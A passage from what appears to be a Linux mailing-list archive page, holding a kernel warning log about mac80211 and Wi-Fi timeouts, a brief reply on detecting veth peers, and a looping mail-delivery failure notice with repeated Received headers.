[   69.387967]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   69.387973]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   69.387977]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   69.387986]  [<c1004121>] ? do_IRQ+0x88/0x99
[   69.387995]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   69.388004]  [<c120d23e>] ? inflate_fast+0x3dc/0x537
[   69.388012]  [<c120ddda>] ? zlib_inflate+0x8dc/0x108d
[   69.388020]  [<c1197c87>] ? zlib_uncompress+0xb1/0x123
[   69.388025]  [<c1197117>] ? squashfs_decompress+0x35/0x5e
[   69.388033]  [<c1193fb5>] ? squashfs_read_data+0x405/0x501
[   69.388040]  [<c1194200>] ? squashfs_cache_get+0x14f/0x267
[   69.388046]  [<c1194200>] ? squashfs_cache_get+0x14f/0x267
[   69.388054]  [<c1194745>] ? squashfs_get_datablock+0x17/0x1c
[   69.388060]  [<c1194745>] ? squashfs_get_datablock+0x17/0x1c
[   69.388066]  [<c1197022>] ? squashfs_readpage_block+0x1c/0x5e
[   69.388072]  [<c11955a2>] ? squashfs_readpage+0x5de/0x702
[   69.388079]  [<c10c6bdf>] ? add_to_page_cache_lru+0x78/0x80
[   69.388087]  [<c10cecbf>] ? __do_page_cache_readahead+0x163/0x18e
[   69.388093]  [<c10cecbf>] ? __do_page_cache_readahead+0x163/0x18e
[   69.388100]  [<c10cf024>] ? page_cache_sync_readahead+0x34/0x3a
[   69.388106]  [<c10c753f>] ? generic_file_read_iter+0x1e3/0x56e
[   69.388113]  [<c10f7914>] ? vfs_iter_read+0x59/0x84
[   69.388121]  [<c12cd92a>] ? loop_queue_work+0x52a/0x783
[   69.388127]  [<c1053e07>] ? finish_task_switch+0x11f/0x174
[   69.388135]  [<c104f3b2>] ? kthread_worker_fn+0x95/0x108
[   69.388141]  [<c104f31d>] ? kthread+0xb3/0xb3
[   69.388147]  [<c104f318>] ? kthread+0xae/0xb3
[   69.388154]  [<c14f0289>] ? ret_from_kernel_thread+0x21/0x38
[   69.388160]  [<c104f26a>] ? kthread_create_on_node+0x100/0x100
[   69.388165] ---[ end trace 2226f818bc03f02a ]---
[   70.718431] ------------[ cut here ]------------
[   70.718485] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   70.718489] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   70.718575] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G        W
4.4.0-android-x86+ #2
[   70.718579] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   70.718583]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d07f6400 f637c7f8
[   70.718595]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f553b500 00200282
[   70.718605]  00000000 00000000 00000000 d07f6e80 f637c420 f553b500
f3f1e800 f57bf600
[   70.718616] Call Trace:
[   70.718628]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   70.718637]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   70.718676]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   70.718683]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   70.718722]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   70.718755]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   70.718762]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   70.718768]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   70.718775]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   70.718782]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   70.718785]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   70.718794]  [<c1004121>] ? do_IRQ+0x88/0x99
[   70.718802]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   70.718810]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   70.718818]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   70.718826]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   70.718831] ---[ end trace 2226f818bc03f02b ]---
[   72.777303] ------------[ cut here ]------------
[   72.777457] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   72.777469] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   72.777609] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G        W
4.4.0-android-x86+ #2
[   72.777613] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   72.777617]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
c987b1c0 f637c7f8
[   72.777640]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f3f1e800 00000000
[   72.777650]  00000000 00000000 00000000 ded10a00 f637c420 f553b500
f3f1e800 f57bfa00
[   72.777661] Call Trace:
[   72.777672]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   72.777680]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   72.777719]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   72.777726]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   72.777764]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   72.777803]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   72.777820]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   72.777835]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   72.777842]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   72.777848]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   72.777852]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   72.777861]  [<c1004121>] ? do_IRQ+0x88/0x99
[   72.777868]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   72.777877]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   72.777885]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   72.777892]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   72.777897] ---[ end trace 2226f818bc03f02c ]---
[   73.592703] ------------[ cut here ]------------
[   73.592756] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   73.592760] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   73.592844] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G        W
4.4.0-android-x86+ #2
[   73.592847] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   73.592852]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d07d9580 f637c7f8
[   73.592863]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f6764cfc 00000000
[   73.592873]  00000000 00000000 00200046 00000000 c190fb18 c190fb08
00200202 00000000
[   73.592884] Call Trace:
[   73.592895]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   73.592905]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   73.592944]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   73.592951]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   73.592989]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   73.592996]  [<c107ae2d>] ? call_rcu_sched+0xc/0xe
[   73.593030]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   73.593036]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   73.593042]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   73.593049]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   73.593056]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   73.593059]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   73.593069]  [<c1004121>] ? do_IRQ+0x88/0x99
[   73.593076]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   73.593084]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   73.593092]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   73.593099]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   73.593103] ---[ end trace 2226f818bc03f02d ]---
[   77.274423] ieee80211 phy0: wlan0: No probe response from AP
00:1a:3f:91:26:e0 after 500ms, disconnecting.
[   77.351726] wlan0: authenticate with 00:1a:3f:91:26:e0
[   77.355209] wlan0: send auth to 00:1a:3f:91:26:e0 (try 1/3)
[   77.555281] wlan0: send auth to 00:1a:3f:91:26:e0 (try 2/3)
[   77.756779] wlan0: send auth to 00:1a:3f:91:26:e0 (try 3/3)
[   77.958465] wlan0: authentication with 00:1a:3f:91:26:e0 timed out

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-09-24 12:03 ` Fwd: " Naveen
@ 2015-09-24 13:09   ` Jiri Benc
  0 siblings, 0 replies; 183+ messages in thread
From: Jiri Benc @ 2015-09-24 13:09 UTC (permalink / raw)
  To: Naveen; +Cc: netdev

On Thu, 24 Sep 2015 08:03:39 -0400, Naveen wrote:
>      Right now the only way to detect if an interface has a peer(veth)
> is touse ethtool -S. Instead I was thinking of adding it to device
> attributes as a peer_ifndex entry. In drivers/net/veth.c I could add
> an entry to
> dev->groups for a veth specific group. Would that be acceptable ?

Recent kernels announce the peer in IFLA_LINK, including its netnsid
(thus it's finally possible to track peers across net namespaces).
Just try "ip a" with a recent kernel.

 Jiri

-- 
Jiri Benc

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2015-06-19  4:39 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2015-06-19  4:39 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org

Technical details of permanent failure: 
Google tried to deliver your message, but it was rejected by the relay smtp.idm.fr by smtp.idm.fr. [62.160.32.11].

The error that the other server returned was:
554 5.4.0 Error: too many hops


----- Original message -----

X-Gm-Message-State: ALoCoQmb0McadphxzT1cRRJDTCrplpR3W/dG3ZtWW4PEZK7mTDrG/z0eLkE9q8o7W/RPVVOS29m+TJmC6YdJ7vDAQ2epBI3k0a3nA5OYgJ/Ze/Ivy+FYt8UPampzZZC+wtbHVacy6vYe
X-Received: by 10.194.177.230 with SMTP id ct6mr21185330wjc.31.1434688747650;
        Thu, 18 Jun 2015 21:39:07 -0700 (PDT)
X-Received: by 10.194.177.230 with SMTP id ct6mr21185316wjc.31.1434688747541;
        Thu, 18 Jun 2015 21:39:07 -0700 (PDT)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id a3si14784040wjb.4.2015.06.18.21.39.07
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:07 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Authentication-Results: mx.google.com;
       spf=fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
Received: from mail-wi0-f169.google.com (mail-wi0-f169.google.com [209.85.212.169])
	by idm.fr (Postfix) with ESMTP id 6B489181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:06 +0200 (CEST)
Received: by wibdq8 with SMTP id dq8so7176459wib.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:07 -0700 (PDT)
X-Received: by 10.194.157.168 with SMTP id wn8mr21450833wjb.79.1434688747008;
        Thu, 18 Jun 2015 21:39:07 -0700 (PDT)
X-Received: by 10.194.157.168 with SMTP id wn8mr21450818wjb.79.1434688746903;
        Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id k8si2442805wia.75.2015.06.18.21.39.06
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f172.google.com (mail-wi0-f172.google.com [209.85.212.172])
	by idm.fr (Postfix) with ESMTP id EAB90181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:05 +0200 (CEST)
Received: by wicnd19 with SMTP id nd19so7622347wic.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
X-Received: by 10.194.248.196 with SMTP id yo4mr12905680wjc.86.1434688746496;
        Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
X-Received: by 10.194.248.196 with SMTP id yo4mr12905671wjc.86.1434688746384;
        Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id g14si17673196wjz.39.2015.06.18.21.39.06
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:06 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wg0-f47.google.com (mail-wg0-f47.google.com [74.125.82.47])
	by idm.fr (Postfix) with ESMTP id 98037181C7D
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:04 +0200 (CEST)
Received: by wgbhy7 with SMTP id hy7so79593515wgb.2
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:05 -0700 (PDT)
X-Received: by 10.180.96.196 with SMTP id du4mr2557957wib.77.1434688745203;
        Thu, 18 Jun 2015 21:39:05 -0700 (PDT)
X-Received: by 10.180.96.196 with SMTP id du4mr2557950wib.77.1434688745100;
        Thu, 18 Jun 2015 21:39:05 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id r7si2458188wix.23.2015.06.18.21.39.04
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:04 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f174.google.com (mail-wi0-f174.google.com [209.85.212.174])
	by idm.fr (Postfix) with ESMTP id 3A045181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:03 +0200 (CEST)
Received: by wicnd19 with SMTP id nd19so7424781wic.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:02 -0700 (PDT)
X-Received: by 10.194.200.73 with SMTP id jq9mr21900528wjc.52.1434688742490;
        Thu, 18 Jun 2015 21:39:02 -0700 (PDT)
X-Received: by 10.194.200.73 with SMTP id jq9mr21900511wjc.52.1434688742372;
        Thu, 18 Jun 2015 21:39:02 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id t19si2472581wij.38.2015.06.18.21.39.01
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f175.google.com (mail-wi0-f175.google.com [209.85.212.175])
	by idm.fr (Postfix) with ESMTP id EE353181EB1
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:00 +0200 (CEST)
Received: by wibdq8 with SMTP id dq8so7175243wib.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
X-Received: by 10.180.105.129 with SMTP id gm1mr2515527wib.51.1434688741568;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
X-Received: by 10.180.105.129 with SMTP id gm1mr2515516wib.51.1434688741479;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id hl4si2429105wib.66.2015.06.18.21.39.01
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f173.google.com (mail-wi0-f173.google.com [209.85.212.173])
	by idm.fr (Postfix) with ESMTP id 8858D181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:39:00 +0200 (CEST)
Received: by wiga1 with SMTP id a1so7467439wig.0
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
X-Received: by 10.180.19.100 with SMTP id d4mr2658853wie.29.1434688741127;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
X-Received: by 10.180.19.100 with SMTP id d4mr2658840wie.29.1434688741027;
        Thu, 18 Jun 2015 21:39:01 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id i18si17610493wjs.183.2015.06.18.21.39.00
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:39:00 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wg0-f47.google.com (mail-wg0-f47.google.com [74.125.82.47])
	by idm.fr (Postfix) with ESMTP id E00E6181C7D
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:59 +0200 (CEST)
Received: by wgfq1 with SMTP id q1so32909237wgf.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:39:00 -0700 (PDT)
X-Received: by 10.194.120.230 with SMTP id lf6mr22327144wjb.41.1434688740038;
        Thu, 18 Jun 2015 21:39:00 -0700 (PDT)
X-Received: by 10.194.120.230 with SMTP id lf6mr22327137wjb.41.1434688739952;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id cu9si2385387wib.124.2015.06.18.21.38.59
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f173.google.com (mail-wi0-f173.google.com [209.85.212.173])
	by idm.fr (Postfix) with ESMTP id 02B8A181E04
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:58 +0200 (CEST)
Received: by wicnd19 with SMTP id nd19so7424115wic.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
X-Received: by 10.180.86.73 with SMTP id n9mr2596951wiz.78.1434688739534;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
X-Received: by 10.180.86.73 with SMTP id n9mr2596947wiz.78.1434688739454;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id el3si2456899wib.24.2015.06.18.21.38.59
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f176.google.com (mail-wi0-f176.google.com [209.85.212.176])
	by idm.fr (Postfix) with ESMTP id 7E7E4181DDB
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:58 +0200 (CEST)
Received: by wicnd19 with SMTP id nd19so7620768wic.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
X-Received: by 10.194.120.198 with SMTP id le6mr22120590wjb.133.1434688739092;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
X-Received: by 10.194.120.198 with SMTP id le6mr22120581wjb.133.1434688739001;
        Thu, 18 Jun 2015 21:38:59 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id g4si17650404wjs.106.2015.06.18.21.38.58
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:58 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f169.google.com (mail-wi0-f169.google.com [209.85.212.169])
	by idm.fr (Postfix) with ESMTP id B881C181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:57 +0200 (CEST)
Received: by wicnd19 with SMTP id nd19so7423790wic.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:58 -0700 (PDT)
X-Received: by 10.180.9.111 with SMTP id y15mr2719692wia.18.1434688738245;
        Thu, 18 Jun 2015 21:38:58 -0700 (PDT)
X-Received: by 10.180.9.111 with SMTP id y15mr2719682wia.18.1434688738154;
        Thu, 18 Jun 2015 21:38:58 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id s1si2498232wiy.4.2015.06.18.21.38.57
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:57 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f180.google.com (mail-wi0-f180.google.com [209.85.212.180])
	by idm.fr (Postfix) with ESMTP id B8A44181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:56 +0200 (CEST)
Received: by wibdq8 with SMTP id dq8so7174215wib.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:57 -0700 (PDT)
X-Received: by 10.194.177.230 with SMTP id ct6mr21184295wjc.31.1434688737326;
        Thu, 18 Jun 2015 21:38:57 -0700 (PDT)
X-Received: by 10.194.177.230 with SMTP id ct6mr21184288wjc.31.1434688737242;
        Thu, 18 Jun 2015 21:38:57 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id dd10si2451160wib.30.2015.06.18.21.38.57
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:57 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f182.google.com (mail-wi0-f182.google.com [209.85.212.182])
	by idm.fr (Postfix) with ESMTP id 374E9181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:56 +0200 (CEST)
Received: by wiga1 with SMTP id a1so7466412wig.0
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:56 -0700 (PDT)
X-Received: by 10.194.60.226 with SMTP id k2mr14768980wjr.10.1434688736757;
        Thu, 18 Jun 2015 21:38:56 -0700 (PDT)
X-Received: by 10.194.60.226 with SMTP id k2mr14768973wjr.10.1434688736648;
        Thu, 18 Jun 2015 21:38:56 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id fa9si2475881wid.33.2015.06.18.21.38.55
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:56 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wg0-f51.google.com (mail-wg0-f51.google.com [74.125.82.51])
	by idm.fr (Postfix) with ESMTP id 19884181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:55 +0200 (CEST)
Received: by wgbhy7 with SMTP id hy7so79591545wgb.2
